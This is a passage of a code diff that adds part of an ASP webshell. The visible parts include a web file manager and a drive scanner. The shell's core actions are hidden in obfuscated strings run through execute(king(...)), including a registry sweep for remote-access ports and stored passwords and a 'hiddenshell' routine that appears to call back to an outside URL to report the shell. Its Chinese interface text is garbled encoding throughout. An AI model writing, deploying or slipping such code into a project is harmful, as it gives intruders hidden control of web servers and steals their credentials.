+si=si&"<br>"&F.Name&"</a><br><a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()' class='am' title='����'>Copy</a> <a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")' onclick='return yesok()' class='am' title='ɾ��'>Del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")' onclick='return yesok()' class='am' title='�ƶ�'>Move</a> <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")' onclick='return yesok()' class='am' title='����'>Down</a></div></td>"
+i=i+1
+If i mod 6=0 then SI=SI&"</tr><tr>"
+Next
+SI=SI&"</tr><tr><td height=2></td></tr></table>"
+j SI &"" : SI="":i=0
+SI="<div id=links><table width='100%' align=center id =linklist2><tr><td id=s><b id=x>Filename</b></td><td id=s height=22><b id=x>Size</b></td><td id=s><b id=x>Type</b></td><td id=s><b id=x>Operating</b></td><td id=s><b id=x>Last Modified</b></td><td></td>"
+For Each L in Fold.files
+SI=SI&"<tr><td height='20' id=d >"
+si=si&"<font face='wingdings' color='#ffffff' size='3'>2</font>"
+si=si&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'>  "&L.Name&"</a><Td id=d>"&clng(L.size/1024)&"K</td><Td id=d>"&L.Type&"</td><Td id=d>"
+si=si&"<a href="""&openUrl(PaTh&"\"&L.nAme)&""" class='am' title='Open'>Open</a> "
+si=si&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+Si=Si&"<a onclick=""window.open('?Action=EditPower&PowerPath="&RepAth(PaTh&"\"&L.nAme)&"','EditPower','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=300,height=200')"" href='###' class='am' title='Ȩ��'>Ȩ��</a>"
+Dim EditOOK
+EditOOK=1
+EditOOV=l.Attributes
+If EditOOV >= 128 Then
+EditOOV = EditOOV - 128
+End If
+If EditOOV >= 64 Then
+EditOOV = EditOOV - 64
+End If
+If EditOOV >= 32 Then
+EditOOV = EditOOV - 32
+End If
+If EditOOV >= 16 Then
+EditOOV = EditOOV - 16
+End If:If EditOOV >= 8 Then
+EditOOV = EditOOV - 8
+End If
+If EditOOV >= 4 Then
+EditOOV = EditOOV - 4:EditOOK=0
+End If
+If EditOOV >= 2 Then
+EditOOV = EditOOV - 2:EditOOK=0
+End If
+If EditOOV >= 1 Then
+EditOOV = EditOOV - 1:EditOOK=0
+End If
+if EditOOK=0 then
+si=si&"<font face='webdings' size='1' color=red>x</font>"
+else
+si=si&"��"
+end if
+si=si&" <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>Copy</a> <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a></td><td id=d>"&replace(L.DateLastModified,"/","-")&"</td></tr>"
+i=i+1
+Next
+j SI&"</tr></table></div><script>var container = new Array(""linklist2""); var objects = new Array(); var links = new Array(); var tmp = new Array(); var interval = 0; var c=0; function initEventListener() { for(i=0; i < container.length; i++) { objects = document.getElementById(container[i]).getElementsByTagName(""td""); for(j=0; j < objects.length; j++) {    if(document.all) { objects[j].attachEvent(""onmouseover"", resetLinkFade); objects[j].attachEvent(""onmouseout"", startLinkFade); } else {objects[j].addEventListener(""mouseover"", resetLinkFade, false); objects[j].addEventListener(""mouseout"", startLinkFade, false); } var defcol = getPseudoRule(container[i], ""td"");  var hovcol = getPseudoRule(container[i], ""td:hover""); if(defcol.charAt(0) == ""#"") defcol = hex2rgb(defcol); else if(defcol[0] == ""r"") { defcol = defcol.match(/rgb\((\d+), (\d+), (\d+)\)/); defcol = defcol.slice(1);} if(hovcol.charAt(0) == ""#"") hovcol = hex2rgb(hovcol); else if(hovcol[0] == ""r""){ hovcol = hovcol.match(/rgb\((\d+), (\d+), (\d+)\)/); hovcol = hovcol.slice(1); } links[c]     = new Array(); links[c][""object""]  = objects[j]; links[c][""defaultcolor""] = defcol; links[c][""currentcolor""] = defcol; links[c][""hovercolor""] = hovcol; c++; } } } function resetLinkFade(e) { var evt = e || window.event; var obj = evt.target || evt.srcElement; for(r=0; r<links.length; r++) { if(obj == links[r][""object""]) { tmp = links[r][""defaultcolor""].clone(); links[r][""currentcolor""] = links[r][""defaultcolor""]; links[r][""object""].style.backgroundColor = rgb2hex(links[r][""hovercolor""]); } } }function startLinkFade(e) {   var evt = e || window.event; var obj = evt.target || evt.srcElement; for(r=0; r<links.length; r++) { if(obj == links[r][""object""]) { links[r][""defaultcolor""] = tmp.clone(); links[r][""currentcolor""] = links[r][""hovercolor""].clone(); links[r][""object""].style.backgroundColor = rgb2hex(links[r][""hovercolor""]); } } if(interval == 0) interval = window.setInterval(linkFade,  30); } function linkFade() {  var runners = 0; for(o=0; o<links.length; o++) { var aim  = links[o][""object""]; var defcol = links[o][""defaultcolor""]; var hovcol = links[o][""hovercolor""]; var actcol = links[o][""currentcolor""]; if( defcol[0]+defcol[1]+defcol[2] != actcol[0]+actcol[1]+actcol[2] ) { runners++; actcol[0] = actcol[0]-10 < 25 ? 25 : actcol[0]-10; actcol[1] = actcol[1]-10 < 25 ? 25 : actcol[1]-10; actcol[2] = actcol[2]-10 < 25 ? 25 : actcol[2]-10; aim.style.backgroundColor = rgb2hex(actcol); links[o][""currentcolor""] = actcol; } } if(runners == 0) { window.clearInterval(interval); interval=0; } } function getPseudoRule(parent, element) {  var mysheet =document.styleSheets[0]; var myrule  = mysheet.cssRules || mysheet.rules; for (n = 0; n < myrule.length; n++) if (myrule[n].selectorText.toLowerCase() == ""#""+ parent +"" ""+ element) return myrule[n].style.backgroundColor; else if (myrule[n].selectorText.toLowerCase() == element) return myrule[n].style.backgroundColor; return """"; } function hex2rgb(hex) { var triplet = hex.toLowerCase().replace(/#/, ''); var rgbArr  = new Array();  if(triplet.length == 6) { rgbArr[0] = parseInt(triplet.substr(0,2), 16) ;rgbArr[1] = parseInt(triplet.substr(2,2), 16) ;rgbArr[2] = parseInt(triplet.substr(4,2), 16) ;return rgbArr; } else if(triplet.length == 3){rgbArr[0] = parseInt((triplet.substr(0,1) + triplet.substr(0,1)), 16); rgbArr[1] = parseInt((triplet.substr(1,1) + triplet.substr(1,1)), 16); rgbArr[2] = parseInt((triplet.substr(2,2) + triplet.substr(2,2)), 16); return rgbArr; } else { throw triplet + ' is not a valid color triplet.'; } } function rgb2hex(rgb) { var hexcolors = new Array(""0"",""1"",""2"",""3"",""4"",""5"",""6"",""7"",""8"",""9"",""a"",""b"",""c"",""d"",""e"",""f""); var r, r1, r2, g, g1, g2, b, b1, b2; r1 = Math.floor(rgb[0] / 16); r2 = rgb[0] - r1*16; g1 = Math.floor(rgb[1] / 16); g2 = rgb[1] - g1*16; b1 = Math.floor(rgb[2] / 16); b2 = rgb[2] - b1*16; r = hexcolors[r1] + hexcolors[r2]; g = hexcolors[g1] + hexcolors[g2]; b = hexcolors[b1] + hexcolors[b2]; return ""#""+r+g+b; } Object.prototype.clone = function(deep) { var objectClone = new this.constructor(); for (var property in this) if (!deep) objectClone[property] = this[property]; else if (typeof this[property] == 'object') objectClone[property] = this[property].clone(deep); else {objectClone[property] = this[property]; }return objectClone; } "&VBNEWLINE
+if ysjb=true then j "initEventListener();</script>":end if
+Set FOLD=Nothing
+End function
+Function DelFile(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɳ�ɾ `&izqY&` ������ϲ��>kw<>kw<>kw<>ktzfte<`=CU��izqY tsoXtztstW.XZ��ftiJ )izqY(lzlobStsoX.XZ yC"))
+End Function
+Function EditFile(Path)
+execute(king("`>dkgy/<>'tcqU'=txsqc 'zodwxl'=thnz 'zodwxl'=tdqf zxhfo<;hlwf&;hlwf&;hlwf&>'ztltN'=txsqc 'ztltk'=thnz 'ztltk'=tdqf zxhfo<;hlwf&;hlwf&;hlwf&>';)(aeqw.nkgzloi'=aeosefg 'aeqA'=txsqc 'fgzzxw'=thnz 'aeqwgu'=tdqf zxhfo<>ki<>kw<>qtkqzbtz/<`&zbJ&`>'167:ziuoti;%110:izrov'=tsnzl 'zftzfgZ'=tdqf qtkqzbtz<>kw<>'%110:izrov'=tsnzl '`&izqY&`'=txsqc 'tdqGX'=tdqf zxhfo<>'ftrroi'=thnJ 'tsoXzorS'=txsqc 'fgozeQ'=tdqf zxhfo<>'dkgXzorS'=tdqf 'zlgh'=rgiztd 'zlgY=9fgozeQ?`&VNM&`'=fgozeq dkgX<` p��yC rfS��WQAkzl=zbJ:`hlq.sstil\`&)`izqYktrsgX`(fgolltU=izqY��tlsS��ufoizgG=J ztU��tlgse.J�� )ssqrqtk.J(trgefSVTJD=zbJ��)tlsqX ,0 ,izqY(tsoyzbtzfthg.XZ=J ztU��ftiJ ``><izqY yC��yC rfS��rfS.tlfghltN��CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɴ汣������ϲ��>kw<>kw<>kw<>ktzfte<`=CU��ufoizgf=J ztU��tlgse.J��)`zftzfge`(dkgy.zltxjtN tfoVtzokK.J��)izqY(tsoXzbtJtzqtkZ.XZ=J ztU��ftiJ `zlgY`=)`9fgozeQ`(zltxjtN yC"))
+End Function
+Function CopyFile(Path)
+execute(king("yC rfS�� CU p��skMaeqA&CU=CU��`>ktzfte/<�������Ƹ�`&)1(izqY&`������ϲ��>kw<>kw<>kw<>ktzfte<`=CU��)0(izqY,)1(izqY tsoXnhgZ.XZ��ftiJ ``><)0(izqY rfq ))1(izqY(lzlobStsoX.XZ yC��)`||||`,izqY(zoshU=izqY"))
+End Function
+Function MoveFile(Path)
+execute(king("yC rfS�� CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɶ���`&)1(izqY&`������ϲ��>kw<>kw<>kw<>ktzfte<`=CU��)0(izqY,)1(izqY tsoXtcgT.XZ��ftiJ ``><)0(izqY rfq ))1(izqY(lzlobStsoX.XZ yC��)`||||`,izqY(zoshU=izqY"))
+End Function
+Function DelFolder(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɳ�ɾ`&izqY&`¼Ŀ��ϲ��>kw<>kw<>kw<>ktzfte<`=CU��izqY ktrsgXtztstW.XZ��ftiJ )izqY(lzlobSktrsgX.XZ yC"))
+End Function
+Function CopyFolder(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�������Ƹ�`&)1(izqY&`¼Ŀ��ϲ��>kw<>kw<>kw<>ktzfte<`=CU��)0(izqY,)1(izqY ktrsgXnhgZ.XZ��ftiJ ``><)0(izqY rfq ))1(izqY(lzlobSktrsgX.XZ yC��)`||||`,izqY(zoshU=izqY"))
+End Function
+Function MoveFolder(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɶ���`&)1(izqY&`¼Ŀ��ϲ��>kw<>kw<>kw<>ktzfte<`=CU��)0(izqY,)1(izqY ktrsgXtcgT.XZ��ftiJ ``><)0(izqY rfq ))1(izqY(lzlobSktrsgX.XZ yC��)`||||`,izqY(zoshU=izqY"))
+End Function
+Function NewFolder(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɽ���`&izqY&`¼Ŀ��ϲ��>kw<>kw<>kw<>ktzfte<`=CU��izqY ktrsgXtzqtkZ.XZ��ftiJ ``><izqY rfq )izqY(lzlobSktrsgX.XZ zgG yC"))
+End Function
+End Class
+
+sub getTerminalInfo()
+execute(king("yo rfS��`����tktivnfQeh���ý��Ʋ�����¼Ŀ��Ĭ���Կ�,��������tktivnfQeh_�ַ�>os<`p��ftiJ )`yoe.`&tdqfktcktl&`\etzfqdnU\qzqW fgozqeoshhQ\lktlM ssQ\lufozztU rfQ lzftdxegW\`&ktcokrlnl(lzlobStsoX.gly yC��)`tdqGktzxhdgZ\tdqGktzxhdgZ\tdqGktzxhdgZ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD`(rqtNutN.ilv=tdqfktcktl��)9,)9(ktrsgXsqoethlztE.glX(zyts=tcokrlnU��)BUX_JUGBZ(zetpwgtzqtkZ.ktcktU=gly ztU��zbtG��yo rfS��yo rfS��`>kw<��ľYDY��д�Ҳ�,¼ĿsoqTwtK�Ҳ��Կ�,������ȨdtzlnUsqegV����,soqdfoK eouqT_���������>os<`p��ftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yo��ftiJ )`soqdfov`,)tdqG.teocktUpwg(tlqes(kzlfo yo��yo rfS��yo rfS��`>kw<Ȩ����ľhlR��ʹ�ǿ��Կ�,������ȨdtzlnUsqegV����,zqedgJ_���������>os<`p��ftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yo��ftiJ )`zqedgz`,)tdqG.teocktUpwg(tlqes(kzlfo yo��yo rfS��yo rft��yo rfS��`>kw<��ľYDY�ǿ��Կ�,dtzlnUsqegVΪ��Ȩ����,�ڴ����tieqhQ_���������>os< `p��tlsS��`>kw<Ȩ���ֱ�Կ�.tieqhQΪ�����ASKǰ��>os<`p��ftiJ )`tieqhQ`,)`SNQKJXBU_NSINSU`(ltswqokqIktcktU.zltxjtN(kzlfo yC��ftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yo��ftiJ `tieqhq`=)tdqG.teocktUpwg(tlqes yo��yo rfS��yo rfS��`>kw<Ȩ��߹�tbt.xl���ǿ��Կ�,������ȨdtzlnUsqegV����,װ��M-cktU_���������>os<`p��ftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yo��ftiJ `M-cktU`=tdqG.teocktUpwg yo��ktzxhdgZpwg fC teocktUpwg ieqS kgX��zbtG tdxltN kgkkS fB��)`teocktU`(nqkkQ = ktzsoX.ktzxhdgZpwg��)`fgozqeoshhQ.sstiU`(zetpwBtzqtkZ.ktcktU = ql ztU��)`.//:JGfoK`(zetpwBztE = ktzxhdgZpwg ztU��`>ki<>kw<]��̽��_�������[`p��`>kw<>kw<>kw<------------------------------------`p��`>kw<`&aa&`:Ϊ����_����ǰ��>os<`p��)ai(rqtNutN.ilv=aa��`zfxgZ\dxfS\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD`=ai��`>kw<`&sdzf&`:Ϊ����sdzG ztfstJ>os<`p��0=sdzG ftiJ ``=sdzf yo��)ntaVTJG(rqtNutN.ilK=sdzf��`VTJG\1.0\ktcktUztfstJ\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntaVTJG��`>kw<`&nshlor&`:������Ǵ�_��ʾ�Է���>os<`p��`��`=nshlor tlst `��`=nshlor ftiJ 1=fougshlor kg ``=fougshlor yC��)`tdqGktlMzlqVnqshloWzfgW\dtzlnU\ltoeosgY\fgolktIzftkkxZ\lvgrfoK\zyglgkeoT\tkqvzygU\SGCDZQT_VQZBV_OSFD`(rqtNutk.ilv=fougshlor��yo rfS��`>zfgy/<>kw<`&rvllqY&`:����>rtk=kgsge zfgy<>tkqxjl=thnz os<`p��`>kw<`&fodrQ&`:������>tkqxjl=thnz os<`p��)`rkgvllqYzsxqytW\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`(rqtNutN.ilK=rvllqY��)`tdqGktlMzsxqytW\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`(rqtNutN.ilK=fodrQ��`>kw<����:��Ƕ�_�Ի���>os<`p��tlsS��`>kw<����δ:��Ƕ�_�Ի���>os<`p��ftiJ ``=fougsgzxQ kg 1=fougsgzxQ yo��)fougsgzxQlo(rqtNutN.ilK=fougsgzxQ��`fgugVfodrQgzxQ\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=fougsgzxQlo��`>zfgy/<>kw<`&tdqGfodrQ&`>rtk=kgsge zfgy<:Ϊ������Ա`&`������Ĭ>os<`p����yo rft��`akgvztG.zhokelK:���в���������`p��ftiz kkt yo��zbtG��`>os/<>zfgy/<>kw<`&tdqG.fodrq&`����Ա����ǰ��>rtk=kgsge zfgy<>os<` p��lktwdtT.hxgkEpwg fo fodrq ieqS kgX��)`hxgku,lkgzqkzlofodrQ/`&tdqGktzxhdgZ.Gz&`//:JGfoK`(zetpwBztE=hxgkEpwg ztU��)`akgvztG.zhokelK`(zetpwBtzqtke.ktcktl=Gz ztU�� zbtf tdxltk kgkkt fg��1=ltkohbS.tlfghltN��`kgzqkzlofodrQ`=tdqGfodrQ ftiJ ``=tdqffodrq yo��)ntFtdqGfodrQ(rqtNutN.ilv=tdqGfodrQ��`tdqGktlMzsxqytWzsQ\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntFtdqGfodrQ��`>kw<`&tdqfeh&`:Ϊ����_��ǰ��>os<`p��`>kw<.������ȡ_������`=tdqfeh ftiJ ``=tdqfeh yo��)ntatdqfeh(rqtNutN.ilv=tdqfeh��`tdqGktzxhdgZ\tdqGktzxhdgZ\tdqGktzxhdgZ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD`=ntatdqfeh��`>0=tmol ki<>kw<]��̽_����ͳϵ[>kw<>kw<`p��zbtf��`>kw<`&)o(lizqh&`>os<`p��)lizqh(rfxgwM gz )lizqh(rfxgwV=o kgX��`>kw<:���侶·_ǰ��ͳϵ`p��`>kw<------------------------------------`p��)`;`,izqYzygU(zoshl=lizqh��`>kw<��֧:_������ɱ��ϵ����>os<`p ftiJ )`ufolok`,gyfoizqY(kzlfo yo��`>kw<��֧:_������ɱ��������>os<`p ftiJ )`lxkocozfq`,gyfoizqY(kzlfo yo��`>kw<��֧:_������ɱ��ϵɽ�� >os<`p ftiJ )`cqa`,gyfoizqY(kzlfo yo��`>kw<��֧:_������ɱssoF>os<`p ftiJ )`ssoF`,gyfoizqY(kzlfo yo��`>kw<��֧:_�ƿ�tktivnfQeY��������>os<`p ftiJ )`tktivnfqeh`,gyfoizqY(kzlfo yo��`>kw<��֧:_�����TXZ>os<`p ftiJ )`4bdfgolxye`,gyfoizqY(kzlfo yo��`>kw<��֧:_��������tseqkB>os<`p ftiJ )`tseqkg`,gyfoizqY(kzlfo yo��`>kw<��֧:_��������VHUnT>os<`p ftiJ )`sjlnd`,gyfoizqY(kzlfo yo��`>kw<��֧:_��������VHUUT>os<`p ftiJ )`ktcktl sjl zyglgkeod`,gyfoizqY(kzlfo yo��`>kw<��֧:_����qcqR>os<`p ftiJ )`qcqp`,gyfoizqY(kzlfo yo��`>kw<��֧:_����sktY>os<`p ftiJ )`skth`,gyfoizqY(kzlfC yo��`:��֧��`&`��ͳϵ`p��)izqYzygU(tlqes=gyfoizqY��)`izqY`(dtzo.zftdfgkocfS.ilK=izqYzygU��`>0=tmol ki<>kw<]��̽��_��ͳϵ[>kw<>kw<>kw<`p��`>sg/<`p��yC rfS��`>kw<` & rkgvllqYfougVgzxq & ` :���ܻ��ʵ�`&`¼�Ƕ���`p��yC rfS��`tlsqX`p��kqtsZ.kkS��ftiJ kkS yC��)ntFllqYfougVgzxq & izqYfougVgzxq(rqtNutN.Llv = rkgvllqYfougVgzxq��`>kw<` & tdqfktlMfougVgzxq & ` :����ͳϵ��`&`¼�Ƕ���`p��)ntFktlMfougVgzxq & izqYfougVgzxq(rqtNutN.Llv = tdqfktlMfougVgzxq��tlsS��ftiJ 1 = tswqfSfougVgzxQlo yC��)ntFtswqfSfougVgzxq & izqYfougVgzxq(rqtNutN.Llv = tswqfSfougVgzxQlo��`rkgvllqYzsxqytW` = ntFllqYfougVgzxq��`tdqGktlMzsxqytW` = ntFktlMfougVgzxq��`fgugVfodrQgzxQ` = ntFtswqfSfougVgzxq��`\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD` = izqYfougVgzxq��yC rfS��`>/kw<` & zkgYdktz & ` :�ڶ�`&`�������ǰ��`p��tlsS ��`>/kw<.���޵��ܷ�����Ȩ��� ,�ڶ˶��յ��÷���`p�� ftiJ 1 >< ktwdxG.kkS kB `` = zkgYdktz yC��`>sg<¼�Ƕ��Լ�`&`�ڶ����_����`p��)ntFzkgYsqfodktz & izqYzkgYsqfodktz(rqtNutN.Llv = zkgYdktz��`ktwdxGzkgY` = ntFzkgYsqfodktz��`\heJ-YWN\lfgozqzUfoK\ktcktU sqfodktJ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD` = izqYzkgYsqfodktz��rkgvllqYfougVgzxq ,tdqfktlMfougVgzxq ,ntFtswqfSfougVgzxq ,tswqfSfougVgzxQlo doW��ntFllqYfougVgzxq ,ntFktlMfougVgzxq ,izqYfougVgzxq doW��zkgYdktz ,ntFzkgYsqfodktz ,izqYzkgYsqfodktz doW��)`sstiU.zhokeUK`(zetpwBtzqtkZ.ktcktU = Llv ztU��`------------------------------------------------------`p��`>kw<`&zkgYKQY&`:Ϊ�ڶ�tktivnfQeY>os<`p��`tktivnfQehװ����`&`�ǻ���`&`��ȷ��.ȡ��`&`����`=zkgYKQY ftiz ``=zkgYKQY yC��)ntFtktivnfQeh(rqtNutN.ilK=zkgYKQY��`zkgYqzqWYCYZJ\dtzlnU\fgolktIzftkkxZ\tktivnfQeh\etzfqdnU\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntFtktivnfQeh��`>zfgy/<>kw<`&zkgYdktJ&`>rtk=kgsge zfgy<:Ϊ�ڶ�teocktU sqfodktJ>os<`p��`��������ktcktU lvgrfoKΪ����`&`��ȷ��.ȡ��`&`����`=zkgYdktJ ftiJ ``=zkgYdktJ yC��)ntFdktJ(rqtNutN.ilK=zkgYdktJ��`ktwdxGzkgY\hez\lrJ\rvhrk\lrK\ktcktU sqfodktJ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\SGCDZQT_VQZBV_OSFD`=ntFdktJ��`>kw<`&zkghzfsJ&`:��`&`��ztfstJ>os<`p��`)����`&`��Ĭ(89`=zfsJ ftiJ ``=zkgYzfsJ yo��)ntFztfstJ(rqtNutN.ilK=zkgYzfsJ��`zkgYztfstJ\1.0\ktcktUztfstJ\zyglgkeoT \SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntaztfstJ��`>0=tmol ki<>kw<]��̽`&`�ڶ�`&`����[>kw<>kw<`p��yo rft��zbtG��`>kw<------------------------------------------------`p��yo rfS��yo rfS��`>kw<`p��zbtf��`,`&)p(vgssqYWM p��)vgssqhrx(rfxgAM gJ )vgssqhrx(rfxgAV = p kgy��`:Ϊ�ڶ�hrx��`&`����>os<`p��tlsS��`>kw<��ȫ:Ϊ�ڶ�hrx��`&`����>os<`p��ftiJ 1=)1(vgssqhrx kg ``=)1(vgssqhrx yC��)YWMssxX(rqtNutN.ilK=vgssqhrx��yo rfS��`>kA<`p��zbtG��`,`&)p(vgssqhez p��)vgssqhez(rfxgAM gJ )vgssqhez(rfxgAV = p kgX��`:Ϊ�ڶ�hez��`&`����>os<`p��tlsS��`>kw<��ȫ:Ϊ�ڶ�hez��`&`����>os<`p��ftiJ 1=)1(vgssqhez kg ``=)1(vgssqhez yC��)YZJssxX(rqtNutN.ilK=vgssqhez��FMS&ArhQ&izqh=YWMssxX��FJS&ArhQ&izqY=YZJssxX��`lzkgYrtvgssQYWM\`=FMS��`lzkgYrtvgssQYZJ\`=FJS��tlst��`>kw<ѡɸYC/heJû>os<`p�� ftiJ 0=ktzsoyhohezgG yo��yC rfS��`>kw<������û��ȡ������UGW`&`��Ĭ>os<`p��tlsS��`>kw<`&kzlUGW&`:ΪUGW`&`����>os<`p��ftiJ ``><kzlUGW yC��)ntFUGW(rqtNutN.ilK=kzlUGW��`ktcktUtdqG\`&ArhQ&izqY=ntFUGW��yo rfS��`>kw<������û��ȡ�����޹���>os<`p��tlsS��zbtG��`>kw<`&)p(nqvtzqE&`:`&p&`����>os<`p��)nqvtzqE(rfxgwM gz )nqvtzqE(rfxgwV=p kgX��ftiJ )nqKtzqE(nqkkqlo yC��)ntFnqKtzqE(rqtkutN.ilK=nqKtzqE��`nqvtzqEzsxqytW\`&ArhQ&izqY=ntFnqKtzqE��yo rfS��`>kw<������û��`&`ȡ������ַ`&`��YC>os<`p��tlsS��zbtG��`>kw<`&)p(krrQYC&`:Ϊ`&p&`ַ`&`��YC>os<`p��)krrQYC(rfxgwM gz )krrQYC(rfxgwV=p kgX��ftiJ ``><)1(krrqYC yC��)ntFYC(rqtkutN.ilK=krrqYC��`lltkrrQYC\`&ArhQ&izqY=ntFYC��`\lteqyktzfC\lktztdqkqY\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\SGCDZQT_VQZBV_OSFD`=izqY��`>kw<`&ArhQ&`:Ϊ�����`&o&`����`p��)``,`\teoctW\`,)o(lrhQ(teqshtN=ArhQ��0-)lrhQ(rfxgAM gJ )lrhQ(rfxgAV=o kgX�� ftiJ )lrhQ(nqkkQlC yC��)ntFrhQ(rqtNutN.ilK=lrhQ��`rfoA\tuqafoV\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD`=ntFrhQ��yC rfS��0=ktzsoyhohezgG��ftiJ ``=tswqfSlo kg 1=tswqfSlo yC��)ntFhoheJtswqfS(rqtkutN.ilK=tswqfSlo��`lktzsoXnzokxetUtswqfS\lktztdqkqY\hoheJ\lteocktU\ztUsgkzfgZzftkkxe\TSJUOU\TVFD`=ntFYCYZJtswqfS��`>0=tmol ki<>kw<]��̽`&`����[`p��)`sstiU.zhokelK`(zetpwgtzqtke=ilv ztl��ilv dor��zbtf tdxltk kgkkt fg"))
+End Sub
+
+sub hiddenshell
+execute(king("`>zhokel/<;'`&skx&)`tdqf_ktcktl`(zltxjtk&`//:hzzi'=fgozqegs.zftkqh>zhokel<` p��ufoizgf=gly ztl��0tdqftsoy&`.`&bthrfk&`\`&0izqhtsoy&`\.\\`,izqhy tsoynhge.gly��0tdqftsoy&`.`&bthrfk&))`/`,skx(ctkkzlfo,skx(zyts=skx��)`skx`(ltswqokqcktcktl.zltxjtk=skx��))`\`,izqhy(ctkkzlfo-)izqhy(fts,izqhy(ziuok=0tdqftsoy��)`.`(izqhhqd.ktcktl=0izqhtsoy��``=)`vpstl`(fgolltl��))40,1(ktwdxfrfk()`|`,bth(zoshl=bthrfk��`2zhs|3zhs|4zhs|5zhs|6zhs|7zhs|8zhs|9zhs|0zhs|2dge|3dge|4dge|5dge|6dge|7dge|8dge|9dge|0dge`=bth��)BUX_JUGBZ(zetpwgtzqtke.ktcktl=gly ztl��))`STQG_JYCNZU`(ltswqokqIktcktU.zltxjtN(izqYhqT.ktcktU=izqhy"))
+end sub
+Sub Message(state,msg,flag)
+j"<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#ddd> <TR></TR><TR><TD align=middle bgcolor=#ecfccd><TABLE width=82% border=0 cellpadding=5 cellspacing=0><TR><TD><FONT color=red>"
+j state
+j"</FONT></TD><TR><TD><P>"&msg
+j"</P></TD></TR></TABLE></TD></TR><TR><TD class=TBEnd>"
+If flag=0 Then
+j" <INPUT type=button value=�ر� onclick='window.close();'>"
+Else
+End if
+j"</TD></TR></TABLE>"
+End Sub
+Function Red(str)
+Red = "<FONT color=#ff2222>" & str & "</FONT>"
+End Function
+
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+
+
+Sub ScanDriveForm()
+Dim FSO,DriveB
+Set FSO = Server.Createobject(CONST_FSO)
+j"<br><TABLE width=480 border=0 align=center cellpadding=3 cellspacing=1 bgcolor=#ffffff><TR><TD colspan=5 class=TBHead>����/ϵͳ�ļ�����Ϣ</TD></TR>"
+  For Each DriveB in FSO.Drives
+j" <TR align=middle class=TBTD><FORM action=?Action=ScanDrive&Drive="
+j DriveB.DriveLetter
+j" method=Post><TD width=25"&chr(37)&"><B>�̷�</B></TD><TD width=15"&chr(37)&">"
+j DriveB.DriveLetter
+j":</TD><TD width=20"&chr(37)&"><B>����</B></TD><TD width=20"&chr(37)&">"
+  Select Case DriveB.DriveType
+  Case 1: j"���ƶ�"
+  Case 2: j"����Ӳ��"
+  Case 3: j"�������"
+  Case 4: j"CD-ROM"
+  Case 5: j"RAM����"
+  Case else: j"δ֪����"
+  End Select
+j"</TD><TD><INPUT type=submit value=��ϸ����></TD></FORM></TR>"
+  Next
+j" <TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(0)
+j" method=Post><TD align=middle><B>Windows�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(0)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(1)
+j" method=Post><TD align=middle><B>System32�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(1)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(2)
+j" method=Post><TD align=middle><B>ϵͳ��ʱ�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(2)
